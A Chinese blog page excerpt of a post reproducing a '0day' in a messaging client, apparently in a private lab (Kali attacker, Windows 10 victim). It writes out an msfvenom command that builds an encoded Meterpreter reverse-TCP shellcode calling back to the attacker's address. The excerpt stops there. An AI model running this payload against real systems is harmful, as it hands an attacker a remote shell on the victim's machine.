- 博客(1)
- 收藏
- 关注
原创 某信0day漏洞复现
测试流程: 攻击机:kali,192.168.43.200 受害机:win10,192.168.43.107 测试版本: 首先生成一段shellcode: msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.43.200 lport=5555 -e x86/shikata_ga_nai -b "\x00" -i 15 -f num -o /root/payload.txt 此时在root用户家目录下生成了一段shellcode代码的txt文
2021-04-19 14:34:18 454 2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人